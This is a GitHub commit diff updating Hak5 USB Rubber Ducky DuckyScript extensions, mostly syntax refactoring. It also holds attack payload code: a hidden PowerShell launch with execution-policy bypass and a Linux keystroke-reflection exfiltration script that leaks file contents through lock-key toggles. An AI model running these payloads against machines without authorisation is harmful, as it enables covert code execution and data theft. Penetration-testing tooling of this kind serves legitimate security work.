hak5
/
usbrubberducky-payloads
mirror of https://github.com/hak5/usbrubberducky-payloads.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge pull request #259 from hak5/1.3.0_updates 

1.3.0 updates
pull/262/head
Dallas Winger 2023-03-14 18:29:47 -04:00 committed by GitHub
parent 8c65e2f3f9 2b8a0d2e03
commit b807c2ca7e
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
12 changed files with 534 additions and 356 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

3
payloads/extensions/community/Rolling_Powershell_Execution
View File

@ -51,7 +51,8 @@ EXTENSION Rolling_Powershell_Execution
STRING powershell.exe -noP -nOnI -windo H
END_IF
IF_DEFINED #EXECUTIONPOLICY
IF_DEFINED_TRUE #EXECUTIONPOLICY
SPACE
IF (($RANDOM_PS % 2) == 0) THEN
STRING -ep ByPasS

27
payloads/extensions/detect_ready.txt
View File

@ -1,23 +1,26 @@
EXTENSION DETECT_READY
REM VERSION 1.0
REM VERSION 1.1
REM AUTHOR: Korben
REM USAGE:
REM Extension runs inline (here)
REM Place at beginning of payload (besides ATTACKMODE) to act as dynamic
REM boot delay
REM_BLOCK DOCUMENTATION
USAGE:
Extension runs inline (here)
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
boot delay
REM TARGETS:
REM Any system that reflects CAPSLOCK will detect minimum required delay
REM Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms
TARGETS:
Any system that reflects CAPSLOCK will detect minimum required delay
Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms
END_REM
REM CONFIGURATION:
DEFINE RESPONSE_DELAY 25
DEFINE ITERATION_LIMIT 120
DEFINE #RESPONSE_DELAY 25
DEFINE #ITERATION_LIMIT 120
VAR $C = 0
WHILE (($_CAPSLOCK_ON == FALSE) && ($C < ITERATION_LIMIT))
WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT))
CAPSLOCK
DELAY RESPONSE_DELAY
DELAY #RESPONSE_DELAY
$C = ($C + 1)
END_WHILE
CAPSLOCK

20
payloads/extensions/exfil_auto_eof_detect.txt
View File

@ -1,18 +1,24 @@
EXTENSION EXFIL_AUTO_EOF_DETECT
REM VERSION 1.0
REM VERSION 1.1
REM AUTHOR: Korben
REM USAGE:
REM Call WAIT_FOR_EOF() after starting Keystroke Reflection / HID Exfil
REM_BLOCK DOCUMENTATION
USAGE:
Call WAIT_FOR_EOF() after starting Keystroke Reflection / HID Exfil
REM TARGETS:
REM Any; intended for use on systems that dont reflect more than 2 lock keys
TARGETS:
Requires reflection of at least 2 lock keys.
Intended for use on systems that dont reflect more than 2 lock keys.
END_REM
REM CONFIGURATION
DEFINE #INACTIVTY_TARGET 10
FUNCTION WAIT_FOR_EOF()
VAR $CURRENT_CAPSLOCK_STATE = $_CAPSLOCK_ON
VAR $CURRENT_NUMLOCK_STATE = $_NUMLOCK_ON
VAR $PROCESSING = TRUE
VAR $INACTIVITY_COUNT = 0
DEFINE INACTIVTY_TARGET 10
WHILE ($PROCESSING)
DELAY 20
IF($CURRENT_CAPSLOCK_STATE != $_CAPSLOCK_ON) THEN
@ -25,7 +31,7 @@ EXTENSION EXFIL_AUTO_EOF_DETECT
LED_R
ELSE
$INACTIVTY_COUNT = ($INACTIVTY_COUNT + 1)
IF ($INACTIVTY_COUNT >= INACTIVTY_TARGET) THEN
IF ($INACTIVTY_COUNT >= #INACTIVTY_TARGET) THEN
$PROCESSING = FALSE
END_IF
LED_OFF

30
payloads/extensions/hello_os.txt
View File

@ -1,13 +1,17 @@
EXTENSION HELLO_OS
REM VERSION 1.0
REM VERSION 1.1
REM AUTHOR: Korben
REM USAGE:
REM For use with OS_DETECT Extension, call HELLO_OS() after DETECT_OS()
REM prints the OS determination
REM_BLOCK DOCUMENTATION
USAGE:
For use with OS_DETECT Extension, call HELLO_OS() after DETECT_OS()
prints the OS determination
END_REM
REM Additional Example: Defining custom $_OS enums
DEFINE SOME_OTHER_OS 6
DEFINE ANOTHER_OS 7
DEFINE #EXTRA_EXAMPLES FALSE
DEFINE #SOME_OTHER_OS 6
DEFINE #ANOTHER_OS 7
FUNCTION HELLO_OS()
IF ($_OS == WINDOWS) THEN
@ -22,12 +26,14 @@ EXTENSION HELLO_OS
STRING Hello ChromeOS!
ELSE IF ($_OS == ANDROID) THEN
STRING Hello Android!
ELSE IF($_OS == SOME_OTHER_OS) THEN
REM Example Only
STRING HELLO Custom OS Type!
ELSE IF($_OS == ANOTHER_OS) THEN
REM Example Only
STRING HELLO Another Custom OS Type!
IF_DEFINED_TRUE #EXTRA_EXAMPLES
ELSE IF($_OS == #SOME_OTHER_OS) THEN
REM Example Only
STRING HELLO Custom OS Type!
ELSE IF($_OS == #ANOTHER_OS) THEN
REM Example Only
STRING HELLO Another Custom OS Type!
END_IF_DEFINED
ELSE
STRING Hello World!
END_IF

106
payloads/extensions/linux_hid_exfil.txt
View File

@ -1,44 +1,94 @@
EXTENSION LINUX_HID_EXFIL
REM VERSION 1.0
REM VERSION 1.1
REM AUTHOR: Korben
REM REQUIRES EXFIL_AUTO_EOF_DETECT EXTENSION
REM REQUIRES EXTENSION EXFIL_AUTO_EOF_DETECT
REM Helpers for Linux Keystroke Reflection data exfiltration
REM This payload is a proof of concept for USB HID only Data Exfiltration
REM_BLOCK DOCUMENTATION
Helpers for Linux Keystroke Reflection data exfiltration
This payload is a proof of concept for USB HID only Data Exfiltration
REM TARGET:
REM Linux Host that supports opening terminal via CTRL ALT t, and xdotool
TARGET:
Linux host that supports opening terminal via CTRL ALT t, and xdotool
REM USAGE:
REM Uncomment the function call below to run this extension inline
REM or call RUN_LINUX_EXFIL() anywhere in your payload after the extension
USAGE:
REQUIRES EXFIL_AUTO_EOF_DETECT EXTENSION
Prepare data to exfil (in filename defined by TARGET_FILE below)
with a terminal window already open - call RUN_LINUX_EXFIL()
REM DEPLOYMENT:
REM Plug Ducky into host, wait for the LED to turn (and stay) solid Green.
DEPLOYMENT:
Plug Ducky into host, wait for the LED to turn (and stay) solid Green.
END_REM
REM CONFIGURATION:
REM File on host machine to exfil using Keystroke Reflection attack
DEFINE TARGET_FILE t.txt
DEFINE TERMINAL_OPEN_DELAY 500
DEFINE READY_TO_TYPE_DELAY 250
DEFINE #TARGET_FILE filename.txt
DEFINE #SAVE_AND_RESTORE_LOCKS TRUE
DEFINE #ENABLE_EXFIL_LEDS TRUE
DEFINE #CLOSE_TERMINAL_AFTER_EXFIL TRUE
REM if TRUE will open terminal, prepare data in #TARGET_FILE, and RUN_LINUX_EXFIL()
DEFINE #RUN_SIMPLE_USAGE_DEMO FALSE
FUNCTION RUN_LINUX_EXFIL()
LED_OFF
DELAY READY_TO_TYPE_DELAY
CTRL ALT t
DELAY TERMINAL_OPEN_DELAY
SAVE_HOST_KEYBOARD_LOCK_STATE
IF_DEFINED_TRUE #ENABLE_EXFIL_LEDS
LED_OFF
$_EXFIL_LEDS_ENABLED = TRUE
END_IF_DEFINED
IF_DEFINED_TRUE #SAVE_AND_RESTORE_LOCKS
SAVE_HOST_KEYBOARD_LOCK_STATE
END_IF_DEFINED
$_EXFIL_MODE_ENABLED = TRUE
$_EXFIL_LEDS_ENABLED = TRUE
STRINGLN uname -a > TARGET_FILE
STRINGLN c="xdotool key --delay 4";o=" Caps_Lock";l=" Num_Lock";bs=$(xxd -b TARGET_FILE |cut -d " " -f2-7);for (( i=0;i<${#bs};i++ ));do b="${bs:$i:1}";if [[ "$b" == "0" ]];then c+=$o;fi;if [[ "$b" == "1" ]];then c+=$l;fi;done;eval "$c";exit
STRING_BASH
c="xdotool key --delay 4";
bs=$(xxd -b
#TARGET_FILE
|cut -d" " -f2-7);
for((i=0;i<${#bs};i++));do
b="${bs:$i:1}";
if [[ "$b" == "0" ]];then
c+=" Caps_Lock";
fi;
if [[ "$b" == "1" ]];then
c+=" Num_Lock";
fi;
done;
$c;
END_STRING
IF_DEFINED_TRUE #CLOSE_TERMINAL_AFTER_EXFIL
STRING exit;
END_IF_DEFINED
ENTER
REM Requires adding EXFIL_AUTO_EOF_DETECT EXTENSION above this one
WAIT_FOR_EOF()
$_EXFIL_LEDS_ENABLED = FALSE
$_EXFIL_MODE_ENABLED = FALSE
RESTORE_HOST_KEYBOARD_LOCK_STATE
IF_DEFINED_TRUE #ENABLE_EXFIL_LEDS
$_EXFIL_LEDS_ENABLED = FALSE
END_IF_DEFINED
IF_DEFINED_TRUE #SAVE_AND_RESTORE_LOCKS
RESTORE_HOST_KEYBOARD_LOCK_STATE
END_IF_DEFINED
END_FUNCTION
REM Uncomment the function call below to run this extension inline (here)
REM or call RUN_WINDOWS_EXFIL() anywhere in your payload after the extension
REM RUN_LINUX_EXFIL()
IF_DEFINED_TRUE #RUN_SIMPLE_USAGE_DEMO
REM DO NOT MODIFY THIS DEMO - copy and move outside extension if using as template.
REM DEMO Boot Delay
DELAY 3000
REM Open Terminal
CTRL ALT t
DELAY 500
REM Perpare some data in TARGET_FILE
STRINGLN uname -a>#TARGET_FILE
REM Exfil data to USB Rubber Ducky using Keystroke Reflection
RUN_LINUX_EXFIL()
END_IF_DEFINED
END_EXTENSION

179
payloads/extensions/os_detect.txt
View File

@ -1,202 +1,217 @@
EXTENSION OS_DETECTION
REM VERSION 1.0
REM VERSION 1.1
REM AUTHOR: Korben
REM USB Rubber Ducky Host OS Detection
REM Generic OS detection at a high view is a moving target
REM results may vary greatly depending
REM on a combination of many variables:
REM - number of testing stages
REM - specific devices and versions tested against
REM - number of systems testing for (scope)
REM - detection techniques (passive/invisible/active/hybrid)
REM - overall speed
REM - overall accuracy
REM_BLOCK DOCUMENTATION
USB Rubber Ducky Host OS Detection
Generic OS detection at a high view is a moving target
results may vary greatly depending
on a combination of many variables:
- number of testing stages
- specific devices and versions tested against
- number of systems testing for (scope)
- detection techniques (passive/invisible/active/hybrid)
- overall speed
- overall accuracy
REM TARGET:
REM DEFAULT - Windows, Mac, Linux
REM ADVANCED_DETECTION - Windows, Mac, Linux, iOS, ChromeOS, Android
If all you require is windows vs <anything other os> detection, the
PASSIVE_WINDOWS_DETECT extension is recommended over this extension.
REM USAGE:
REM Uncomment the function call below to run this extension inline (here)
REM or call DETECT_OS() anywhere in your payload after the extension
REM Place this extension and the DETECT_OS() before
REM you would like to first reference $_OS to execute payload code conditionally
TARGET:
DEFAULT - Windows, Mac, Linux
ADVANCED_DETECTION - Windows, Mac, Linux, iOS, ChromeOS, Android
USAGE:
Uncomment the function call below to run this extension inline (here)
or call DETECT_OS() anywhere in your payload after the extension
Place this extension and the DETECT_OS() before
you would like to first reference $_OS to execute payload code conditionally
FEEDBACK:
As mentioned above, this a moving target (especially for mac systems)
Please report any issues identifying specific operating systems.
Your feedback will greatly help solidify the robustness of this extension
DEBUGGING:
SET DEBUGGING_OUTPUT DEFINE to TRUE, deploy on a target with text editor open for debug output
END_REM
REM CONFIGURATION:
DEFINE VERBOSE FALSE
DEFINE ADVANCED_DETECTION FALSE
DEFINE STARTUP_DELAY 1500
DEFINE RESTART_WAIT 1000
DEFINE CONNECT_WAIT 1000
DEFINE OS_DETECT_MODE HID
DEFINE OS_DETECT_VID VID_05AC
DEFINE OS_DETECT_PID PID_021E
DEFINE WINDOWS_HOST_REQUEST_COUNT 2
DEFINE HOST_RESPONSE_TIMEOUT 1000
REM For Debugging:
DEFINE #DEBUGGING_OUTPUT FALSE
DEFINE #ADVANCED_DETECTION FALSE
REM Timing fine tuning:
DEFINE #STARTUP_DELAY 1500
DEFINE #RESTART_WAIT 1000
DEFINE #CONNECT_WAIT 1000
DEFINE #OS_DETECT_MODE HID
DEFINE #OS_DETECT_VID VID_05AC
DEFINE #OS_DETECT_PID PID_021E
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
DEFINE #HOST_RESPONSE_TIMEOUT 1000
FUNCTION DETECT_OS()
$_HOST_CONFIGURATION_REQUEST_COUNT = 0
ATTACKMODE OS_DETECT_MODE OS_DETECT_VID OS_DETECT_PID
DELAY STARTUP_DELAY
ATTACKMODE #OS_DETECT_MODE #OS_DETECT_VID #OS_DETECT_PID
DELAY #STARTUP_DELAY
SAVE_HOST_KEYBOARD_LOCK_STATE
IF VERBOSE THEN
IF ADVANCED_DETECTION THEN
IF_DEFINED_TRUE #DEBUGGING_OUTPUT
IF_DEFINED_TRUE #ADVANCED_DETECTION
STRING ADVANCED OS DETECT
ELSE
ELSE_DEFINED
STRING OS DETECT
END_IF
END_IF_DEFINED
ENTER
STRING test caps
END_IF
END_IF_DEFINED
IF ($_CAPSLOCK_ON == FALSE) THEN
LED_R
CAPSLOCK
DELAY HOST_RESPONSE_TIMEOUT
DELAY #HOST_RESPONSE_TIMEOUT
END_IF
LED_OFF
IF VERBOSE THEN
IF_DEFINED_TRUE #DEBUGGING_OUTPUT
ENTER
STRING test done
END_IF
END_IF_DEFINED
IF $_RECEIVED_HOST_LOCK_LED_REPLY THEN
IF VERBOSE THEN
IF_DEFINED_TRUE #DEBUGGING_OUTPUT
ENTER
STRING received led response
END_IF
END_IF_DEFINED
LED_G
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > WINDOWS_HOST_REQUEST_COUNT) THEN
IF VERBOSE THEN
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
IF_DEFINED_TRUE #DEBUGGING_OUTPUT
ENTER
STRING prediction: Windows
END_IF
END_IF_DEFINED
$_OS = WINDOWS
ELSE
IF VERBOSE THEN
IF_DEFINED_TRUE #DEBUGGING_OUTPUT
ENTER
STRING prediction: Linux
END_IF
END_IF_DEFINED
$_OS = LINUX
END_IF
ELSE
IF VERBOSE THEN
IF_DEFINED_TRUE #DEBUGGING_OUTPUT
ENTER
STRING no led response
ENTER
STRING prediciton: MacOS
END_IF
END_IF_DEFINED
$_OS = MACOS
END_IF
IF ADVANCED_DETECTION THEN
IF_DEFINED_TRUE #ADVANCED_DETECTION
IF ( $_OS == LINUX ) THEN
IF VERBOSE THEN
IF_DEFINED_TRUE #DEBUGGING_OUTPUT
ENTER
STRING soft reconnect
END_IF
END_IF_DEFINED
ATTACKMODE OFF
DELAY RESTART_WAIT
ATTACKMODE OS_DETECT_MODE OS_DETECT_VID OS_DETECT_PID
DELAY CONNECT_WAIT
IF VERBOSE THEN
DELAY #RESTART_WAIT
ATTACKMODE #OS_DETECT_MODE #OS_DETECT_VID #OS_DETECT_PID
DELAY #CONNECT_WAIT
IF_DEFINED_TRUE #DEBUGGING_OUTPUT
ENTER
STRING reconnected
END_IF
END_IF_DEFINED
IF ($_CAPSLOCK_ON == TRUE) THEN
IF VERBOSE THEN
IF_DEFINED_TRUE #DEBUGGING_OUTPUT
ENTER
STRING caps led on
ENTER
STRING test numlock
END_IF
END_IF_DEFINED
NUMLOCK
DELAY HOST_RESPONSE_TIMEOUT
IF VERBOSE THEN
DELAY #HOST_RESPONSE_TIMEOUT
IF_DEFINED_TRUE #DEBUGGING_OUTPUT
ENTER
STRING test done
END_IF
END_IF_DEFINED
IF ($_NUMLOCK_ON == FALSE) THEN
IF VERBOSE THEN
IF_DEFINED_TRUE #DEBUGGING_OUTPUT
ENTER
STRING no numlock led
ENTER
STRING prediciton: ChromeOS
END_IF
END_IF_DEFINED
$_OS = CHROMEOS
ELSE
IF VERBOSE THEN
IF_DEFINED_TRUE #DEBUGGING_OUTPUT
ENTER
STRING numlock led on
ENTER
STRING testing scrolllock
END_IF
END_IF_DEFINED
SCROLLLOCK
DELAY HOST_RESPONSE_TIMEOUT
IF VERBOSE THEN
DELAY #HOST_RESPONSE_TIMEOUT
IF_DEFINED_TRUE #DEBUGGING_OUTPUT
ENTER
STRING test done
END_IF
END_IF_DEFINED
IF ($_SCROLLLOCK_ON == TRUE) THEN
IF VERBOSE THEN
IF_DEFINED_TRUE #DEBUGGING_OUTPUT
ENTER
STRING scrolllock led on
ENTER
STRING prediciton: Android
END_IF
END_IF_DEFINED
$_OS = ANDROID
ELSE
IF VERBOSE THEN
IF_DEFINED_TRUE #DEBUGGING_OUTPUT
ENTER
STRING no scrolllock reply
ENTER
STRING prediction: Linux
END_IF
END_IF_DEFINED
$_OS = LINUX
END_IF
END_IF
END_IF
ELSE IF ($_OS == MACOS) THEN
IF ($_CAPSLOCK_ON == TRUE) THEN
IF VERBOSE THEN
IF_DEFINED_TRUE #DEBUGGING_OUTPUT
ENTER
STRING caps led on
ENTER
STRING prediction: iOS
END_IF
END_IF_DEFINED
$_OS = IOS
ELSE
IF VERBOSE THEN
IF_DEFINED_TRUE #DEBUGGING_OUTPUT
ENTER
STRING no caps reply
ENTER
STRING prediction: MacOS
END_IF
END_IF_DEFINED
$_OS = MACOS
END_IF
ELSE IF ($_OS == WINDOWS) THEN
IF VERBOSE THEN
IF_DEFINED_TRUE #DEBUGGING_OUTPUT
ENTER
STRING Confident Windows Prediction
END_IF
END_IF_DEFINED
$_OS = WINDOWS
END_IF
END_IF
END_IF_DEFINED
RESTORE_HOST_KEYBOARD_LOCK_STATE
IF VERBOSE THEN
IF_DEFINED_TRUE #DEBUGGING_OUTPUT
ENTER
STRING OS_DETECT complete
ENTER
END_IF
END_IF_DEFINED
END_FUNCTION
REM Uncomment the function call below to run this extension inline (here)
REM or call DETECT_OS() anywhere in your payload after the extension
REM DETECT_OS()
END_EXTENSION

25
payloads/extensions/passive_detect_ready.txt
View File

@ -1,21 +1,24 @@
EXTENSION PASSIVE_DETECT_READY
REM VERSION 1.0
REM VERSION 1.1
REM AUTHOR: Korben
REM Passive Detect Ready - no injection dynamic boot delay
REM for hosts that reflect current OS lock key state on connect
REM_BLOCK DOCUMENTATION
Passive Detect Ready - no injection dynamic boot delay
for hosts that reflect current OS lock key state on connect
REM USAGE:
REM Extension runs inline (here)
REM Place at beginning of payload (besides ATTACKMODE) to act as dynamic
REM boot delay
USAGE:
Extension runs inline (here)
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
boot delay
END_REM
REM CONFIGURATION:
DEFINE MAX_WAIT 150
DEFINE CHECK_INTERVAL 20
DEFINE #MAX_WAIT 150
DEFINE #CHECK_INTERVAL 20
VAR $MAX_TRIES = MAX_WAIT
VAR $MAX_TRIES = #MAX_WAIT
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
DELAY CHECK_INTERVAL
DELAY #CHECK_INTERVAL
$MAX_TRIES = ($MAX_TRIES - 1)
END_WHILE
END_EXTENSION

53
payloads/extensions/passive_windows_detect.txt
View File

@ -1,37 +1,42 @@
EXTENSION PASSIVE_WINDOWS_DETECT
REM VERSION 1.0
REM VERSION 1.1
REM AUTHOR: Korben
REM Windows fully passive OS Detection and passive Detect Ready
REM Includes its own passive detect ready. Does not require
REM additional extensions
REM_BLOCK DOCUMENTATION
Windows fully passive OS Detection and passive Detect Ready
Includes its own passive detect ready.
Does not require additional extensions.
REM USAGE:
REM Extension runs inline (here)
REM Place at beginning of payload (besides ATTACKMODE) to act as dynamic
REM boot delay
REM $_OS will be set to WINDOWS or NOT_WINDOWS
USAGE:
Extension runs inline (here)
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
boot delay
$_OS will be set to WINDOWS or NOT_WINDOWS
See end of payload for usage within payload
END_REM
REM CONFIGURATION:
DEFINE MAX_WAIT 150
DEFINE CHECK_INTERVAL 20
DEFINE WINDOWS_HOST_REQUEST_COUNT 2
DEFINE NOT_WINDOWS 7
DEFINE #MAX_WAIT 150
DEFINE #CHECK_INTERVAL 20
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
DEFINE #NOT_WINDOWS 7
VAR $MAX_TRIES = MAX_WAIT
$_OS = #NOT_WINDOWS
VAR $MAX_TRIES = #MAX_WAIT
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
DELAY CHECK_INTERVAL
DELAY #CHECK_INTERVAL
$MAX_TRIES = ($MAX_TRIES - 1)
END_WHILE
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > WINDOWS_HOST_REQUEST_COUNT) THEN
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
$_OS = WINDOWS
ELSE
$_OS = NOT_WINDOWS
END_IF
REM EXAMPLE USAGE AFTER EXTENSION
REM IF ($_OS == WINDOWS) THEN
REM STRING HELLO WINDOWS!
REM ELSE
REM STRING HELLO WORLD!
REM END_IF
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
IF ($_OS == WINDOWS) THEN
STRING HELLO WINDOWS!
ELSE
STRING HELLO WORLD!
END_IF
END_REM
END_EXTENSION

62
payloads/extensions/protected_storage_mode.txt
View File

@ -1,38 +1,62 @@
EXTENSION PROTECTED_STORAGE_MODE
REM VERSION 1.0
REM VERSION 1.1
REM AUTHOR: Korben
REM Example hidden storage mode
REM Forces user to padlock style unlock storage mode by setting
REM the HOSTs lock keys and pressing the duck button to submit a
REM combination three times.
REM The wrong combination will immediately fail silently.
REM The correct combination will trigger ATTACKMODE STORAGE and LED_G
REM_BLOCK
Example hidden storage mode
Forces user to padlock style unlock storage mode by setting
the HOSTs lock keys and pressing the duck button to submit a
combination three times.
The wrong combination will immediately fail silently.
The correct combination will trigger ATTACKMODE STORAGE and LED_G
REM TARGET:
REM Any host that will reflect CAPSLOCK,NUMLOCK, and SCROLLLOCK
TARGET:
Any host that will reflect CAPSLOCK,NUMLOCK, and SCROLLLOCK
REM USAGE:
REM BUTTON_DEF
REM STORAGE_PASSWORD_CHECK()
REM END_BUTTON
USAGE:
BUTTON_DEF
STORAGE_PASSWORD_CHECK()
END_BUTTON
CONFIGURATION:
Available combinations provided as DEFINEs below,
change within the STORAGE_PASSWORD_CHECK as desired
Method of input submission can be changed using SUBMIT_FOR_CHECK
But will obviously convolute combination checks.
END_REM
REM Combinations provided as defines for convenience (verbosely spaced - DEFINES aren't re-formatted by preprocessor)
DEFINE #ALL_LOCKS_OFF ( ( $_CAPSLOCK_ON == FALSE ) && ( $_NUMLOCK_ON == FALSE ) && ( $_SCROLLLOCK_ON == FALSE ) )
DEFINE #ALL_LOCKS_ON ( ( $_CAPSLOCK_ON == TRUE ) && ( $_NUMLOCK_ON == TRUE ) && ( $_SCROLLLOCK_ON == FALSE ) )
DEFINE #ONLY_CAPS_ON ( ( $_CAPSLOCK_ON == TRUE ) && ( $_NUMLOCK_ON == FALSE ) && ( $_SCROLLLOCK_ON == FALSE ) )
DEFINE #ONLY_NUM_ON ( ( $_CAPSLOCK_ON == FALSE ) && ( $_NUMLOCK_ON == TRUE ) && ( $_SCROLLLOCK_ON == FALSE ) )
DEFINE #ONLY_SCROLL_ON ( ( $_CAPSLOCK_ON == FALSE ) && ( $_NUMLOCK_ON == FALSE ) && ( $_SCROLLLOCK_ON == TRUE ) )
DEFINE #ONLY_CAPS_OFF ( ( $_CAPSLOCK_ON == FALSE ) && ( $_NUMLOCK_ON == TRUE ) && ( $_SCROLLLOCK_ON == TRUE ) )
DEFINE #ONLY_NUM_OFF ( ( $_CAPSLOCK_ON == TRUE ) && ( $_NUMLOCK_ON == FALSE ) && ( $_SCROLLLOCK_ON == TRUE ) )
DEFINE #ONLY_SCROLL_OFF ( ( $_CAPSLOCK_ON == TRUE ) && ( $_NUMLOCK_ON == TRUE ) && ( $_SCROLLLOCK_ON == FALSE ) )
DEFINE #SUBMIT_FOR_CHECK WAIT_FOR_BUTTON_PRESS
FUNCTION STORAGE_PASSWORD_CHECK()
VAR $ACCEPED = FALSE
LED_R
WAIT_FOR_BUTTON_PRESS
#SUBMIT_FOR_CHECK
REM first combination ALL LOCKS OFF
IF (($_CAPSLOCK_ON == FALSE) && ($_NUMLOCK_ON == FALSE) && ($_SCROLLLOCK_ON == FALSE)) THEN
IF #ALL_LOCKS_OFF THEN
STRING .
WAIT_FOR_BUTTON_PRESS
#SUBMIT_FOR_CHECK
REM second combination ONLY CAPS ON
IF (($_CAPSLOCK_ON == TRUE) && ($_NUMLOCK_ON == FALSE) && ($_SCROLLLOCK_ON == FALSE)) THEN
IF #ONLY_CAPS_ON THEN
STRING .
WAIT_FOR_BUTTON_PRESS
#SUBMIT_FOR_CHECK
REM third combination ONLY NUM ON
IF (($_CAPSLOCK_ON == FALSE) && ($_NUMLOCK_ON == TRUE) && ($_SCROLLLOCK_ON == FALSE)) THEN
IF #ONLY_NUM_ON THEN
$ACCEPTED = TRUE
END_IF
END_IF

273
payloads/extensions/translate.txt
View File

@ -1,41 +1,52 @@
EXTENSION TRANSLATE
REM VERSION 1.0
REM VERSION 1.1
REM AUTHOR: Korben
REM This extension acts as a library or collection of helper functions
REM to work with converting variables in your payloads.
REM WHY:
REM Of the many ways to get information about the state of your payload
REM is by injecting static strings effectively as debugging prints
REM However, given the non-static nature of payloads using variables in
REM DuckyScript 3.0 - the ability to decode variables during payload
REM execution and print (inject) representations of their current state
REM can often be a critically helpful development and debugging tool.
REM_BLOCK DOCUMENTATION
This extension acts as a library or collection of helper functions
to work with converting variables in your payloads.
WHY:
Of the many ways to get information about the state of your payload
is by injecting static strings effectively as debugging prints
However, given the non-static nature of payloads using variables in
DuckyScript 3.0 - the ability to decode variables during payload
execution and print (inject) representations of their current state
can often be a critically helpful development and debugging tool.
REM Available Functions:
REM TRANSLATE_INT() - var to decimal string - set $INPUT prior to call
REM TRANSLATE_HEX() - var to hexidecimal string - set $INPUT prior to call
REM TRANSLATE_BINARY() - var to binary string - set $INPUT prior to call
REM TRANSLATE_BOOL() - var to boolean string - set $INPUT prior to call
Available Functions:
DEFAULT:
TRANSLATE_INT() - var to decimal string - set $INPUT prior to call
EXTENDED: (enabled using the #INCLUDE defines below):
TRANSLATE_HEX() - var to hexidecimal string - set $INPUT prior to call
TRANSLATE_BINARY() - var to binary string - set $INPUT prior to call
TRANSLATE_BOOL() - var to boolean string - set $INPUT prior to call
REM USAGE:
REM set $INPUT to desired var
REM call the correct translate_ function for the expected data type e.g.
REM VAR $myVar = 1234
REM $INPUT = $myVar
REM TRANSLATE_INT()
REM REM the above code will inject 1234
USAGE:
set $INPUT to desired var
call the correct translate_ function for the expected data type e.g.
VAR $myVar = 1234
$INPUT = $myVar
TRANSLATE_INT()
REM the above code will inject 1234
END_REM
REM begin extension variables
DEFINE PRINT_INT 0
DEFINE PRINT_HEX 1
VAR $DIGIT_PRINT_MODE = PRINT_INT
REM CONFIGURATION:
DEFINE #INCLUDE_TRANSLATE_HEX FALSE
DEFINE #INCLUDE_TRANSLATE_BOOL FALSE
DEFINE #INCLUDE_TRANSLATE_BINARY FALSE
DEFINE #INCLUDE_SWAP_ENDIAN FALSE
REM Append ENTER after translation
VAR $AS_STRINGLN = TRUE
DEFINE #PRINT_INT 0
DEFINE #PRINT_HEX 1
VAR $DIGIT_PRINT_MODE = #PRINT_INT
VAR $D = 0
VAR $IN = 0
VAR $INPUT = 0
VAR $MOD = 0
VAR $P = FALSE
VAR $NL = TRUE
REM end extension variables
REM REQUIRED for INT/HEX - convert int to char
FUNCTION PRINTDIGIT()
@ -59,20 +70,22 @@ EXTENSION TRANSLATE
STRING 8
ELSE IF ($D == 9) THEN
STRING 9
ELSE IF ($DIGIT_PRINT_MODE == PRINT_HEX) THEN
IF ($D == 10) THEN
STRING A
ELSE IF ($D == 11) THEN
STRING B
ELSE IF ($D == 12) THEN
STRING C
ELSE IF ($D == 13) THEN
STRING D
ELSE IF ($D == 14) THEN
STRING E
ELSE IF ($D == 15) THEN
STRING F
END_IF
IF_DEFINED_TRUE #INCLUDE_TRANSLATE_HEX
ELSE IF ($DIGIT_PRINT_MODE == #PRINT_HEX) THEN
IF ($D == 10) THEN
STRING A
ELSE IF ($D == 11) THEN
STRING B
ELSE IF ($D == 12) THEN
STRING C
ELSE IF ($D == 13) THEN
STRING D
ELSE IF ($D == 14) THEN
STRING E
ELSE IF ($D == 15) THEN
STRING F
END_IF
END_IF_DEFINED
ELSE
STRING ?
END_IF
@ -91,15 +104,18 @@ EXTENSION TRANSLATE
END_IF
END_FUNCTION
REM ENDIAN SWAPPER helper, (useful for working with VID/PID)
FUNCTION SWAP_ENDIAN()
$INPUT = ((($INPUT >> 8) & 0x00FF) | (($INPUT << 8) & 0xFF00))
END_FUNCTION
IF_DEFINED_TRUE #INCLUDE_SWAP_ENDIAN
REM ENDIAN SWAPPER helper, (useful for working with VID/PID)
FUNCTION SWAP_ENDIAN()
$INPUT = ((($INPUT >> 8) & 0x00FF) | (($INPUT << 8) & 0xFF00))
END_FUNCTION
END_IF_DEFINED
REM Translates a variable of presumed integer type and attempts to convert
REM and inject a DECIMAL string representation
FUNCTION TRANSLATE_INT()
$DIGIT_PRINT_MODE = PRINT_INT
$DIGIT_PRINT_MODE = #PRINT_INT
$P = FALSE
IF ( $INPUT >= 10000) THEN
$MOD = 10000
@ -119,99 +135,108 @@ EXTENSION TRANSLATE
END_IF()
$D = $INPUT
PRINTDIGIT()
IF $NL THEN
IF $AS_STRINGLN THEN
ENTER
END_IF
END_FUNCTION
REM Translates a variable of presumed boolean type and attempts to convert
REM and inject a BOOLEAN string representation
FUNCTION TRANSLATE_BOOL()
IF $INPUT THEN
STRING TRUE
ELSE
STRING FALSE
END_IF
IF $NL THEN
ENTER
END_IF
END_FUNCTION
REM TO ENABLE SET INCLUDE_TRANSLATE_BOOL to TRUE before compiling
IF_DEFINED_TRUE #INCLUDE_TRANSLATE_BOOL
FUNCTION TRANSLATE_BOOL()
IF $INPUT THEN
STRING TRUE
ELSE
STRING FALSE
END_IF
IF $AS_STRINGLN THEN
ENTER
END_IF
END_FUNCTION
END_IF_DEFINED
REM Translates a variable of presumed integer type and attempts to convert
REM and inject a HEX string representation
FUNCTION TRANSLATE_HEX()
